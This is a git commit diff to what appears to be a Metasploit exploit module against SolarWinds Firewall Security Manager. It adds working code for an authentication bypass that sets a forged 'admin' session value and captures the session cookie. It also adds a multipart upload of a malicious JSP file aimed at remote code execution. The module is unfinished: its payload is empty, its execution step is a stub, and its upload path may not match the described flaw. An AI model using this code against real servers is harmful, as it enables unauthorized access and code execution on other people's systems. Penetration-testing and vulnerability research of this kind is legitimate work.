Some progress

wchen-r7 · wchen-r7 · commit 6795c90eacf7 · 2015-03-31T20:46:34.000-05:00
diff --git a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb
@@ -19,8 +19,8 @@ def initialize(info={})
         6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface
         due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set
         the 'username' attribute before authentication. The second problem is that the settings-new.jsp
-        file will only check the 'username' attribute for 'uploadFile' action's authorization, which
-        can be exploited and allows the attacker to upload a malicious file to the server, and results
+        file will only check the 'username' attribute before authorizing the 'uploadFile' action, which
+        can be exploited and allows the attacker to upload a fake xls file to the server, and results
         in arbitrary code execution.
 
         Depending on the installation, by default the Change Advisor web server is listening on port
@@ -42,7 +42,6 @@ def initialize(info={})
         },
       'DefaultOptions'  =>
         {
-          'EXITFUNC' => "none",
           'RPORT'    => 48080
         },
       'Platform'       => 'win',
@@ -53,37 +52,115 @@ def initialize(info={})
       'Privileged'     => false,
       'DisclosureDate' => "Mar 13 2015",
       'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base FMS directory path", '/'])
+      ], self.class)
   end
 
 
   # Returns a checkcode that indicates whether the target is FSM or not
   def check
-  end
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'fsm', 'login.jsp'))
 
+    if res && res.body =~ /SolarWinds FSM Change Advisor/i
+      return Exploit::CheckCode::Detected
+    end
 
-  # Creates an arbitrary username by abusing the server's unsafe use of session.putValue
-  def put_session_value(value)
+    Exploit::CheckCode::Safe
   end
 
 
-  # Uploads a malicious JSP file and then execute it
-  def upload_exec(filename, malicious_file)
-  end
-
   # Exploit/run command
   def exploit
     unless check == Exploit::CheckCode::Detected
-      print_error("Target does not appear to be a Solarwinds Firewall Security Manager")
-      return
+      fail_with(Failure::NotVulnerable, 'Target does not appear to be a Solarwinds Firewall Security Manager')
     end
 
     username = 'admin'
-    print_status("Putting session value: #{username}")
-    put_session_value('admin')
+    print_status("Putting session value: username=#{username}")
+    sid = put_session_value('admin')
+    print_status("Your SID is: #{sid}")
 
     filename = "test.jsp"
     malicious_file = ''
     print_status("Uploading file: #{filename}")
-    upload_exec(filename, malicious_file)
+    upload_exec(sid, filename, malicious_file)
+  end
+
+
+  private
+
+
+  # Creates an arbitrary username by abusing the server's unsafe use of session.putValue
+  def put_session_value(value)
+    res = send_request_cgi(
+      'uri'      => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'),
+      'method'   => 'GET',
+      'vars_get' => { 'username' => value }
+    )
+
+    unless res
+      fail_with(Failure::Unknown, 'The connection timed out while setting the session value')
+    end
+
+    get_sid(res)
+  end
+
+
+  # Returns the session ID
+  def get_sid(res)
+    cookies = res.get_cookies
+    sid = cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
+    sid
   end
+
+
+  # Uploads a malicious file and then execute it
+  def upload_exec(sid, filename, malicious_file)
+    res = upload_file(sid, filename, malicious_file)
+
+    unless res
+      fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file')
+    end
+
+    exec_file(sid, filename)
+  end
+
+
+  # Uploads a malicious file
+  # By default, the file will be saved at the following location:
+  # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\
+  def upload_file(sid, filename, malicious_file)
+    mime_data = Rex::MIME::Message.new
+    mime_data.add_part(malicious_file, nil, nil, "name=\"file\"; filename=\"#{filename}\"")
+    mime_data.add_part('uploadFile', nil, nil, 'name="action"')
+
+    proto = ssl ? 'https' : 'http'
+    ref = "#{proto}://#{rhost}:#{rport}#{normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp')}"
+
+    send_request_cgi(
+      'uri'      => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'),
+      'method'   => 'POST',
+      'vars_get' => { 'action' => 'uploadFile' },
+      'ctype'    => "multipart/form-data; boundary=#{mime_data.bound}",
+      'data'     => mime_data.to_s,
+      'cookie'   => sid,
+      'headers'  => { 'Referer' => ref }
+    )
+  end
+
+
+  # Executes the malicious file and get code execution
+  def exec_file(sid, filename)
+  end
+
+
+  # Overrides the original print_status so we make sure we print the rhost and port
+  def print_status(msg)
+    super("#{rhost}:#{rport} - #{msg}")
+  end
+
 end
+
